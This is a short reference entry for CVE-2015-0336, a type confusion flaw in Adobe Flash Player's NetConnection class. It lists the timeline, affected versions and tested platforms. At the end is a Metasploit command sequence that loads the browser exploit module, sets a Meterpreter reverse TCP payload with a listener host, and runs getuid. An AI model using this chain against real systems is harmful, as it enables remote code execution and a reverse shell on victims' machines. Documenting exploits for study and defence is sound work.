CVE-2015-0336 Adobe Flash Player NetConnection Type Confusion

Timeline :

Vulnerability discovered and reported to the vendor by Natalie Silvanovich in January 2015
Patch provided by the vendor via APSA15-05 the 2015-03-12
Vulnerability found exploited into exploit kits the 2015-03-19
Details of the vulnerability provided by Google Security the 2015-04-13
Metasploit PoC provided the 2015-05-28

PoC provided by :

Natalie Silvanovich
Unknown
juan vazquez

Reference(s) :

CVE-2015-0336
APSB15-05

Affected version(s) :

Adobe Flash Player 16.0.0.305 and earlier versions
Adobe Flash Player 11.2.202.442 and earlier 11.x versions

Tested onĀ :

Windows 7 SP1 with IE 8 and Flash 16.0.0.305

Description :

This module exploits a type confusion vulnerability in the NetConnection class on Adobe Flash Player. When using a correct memory layout this vulnerability allows to corrupt arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and ultimately accomplish remote code execution. This module has been tested successfully on:

* Windows 7 SP1 (32-bit), IE 8, IE11 and Adobe Flash 16.0.0.305.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 16.0.0.305.
* Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.424.
* Ubuntu 14.04.2 LTS, Firefox 33.0 and Adobe Flash 11.2.202.442.

Commands :

use exploit/multi/browser/adobe_flash_net_connection_confusion
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138

getuid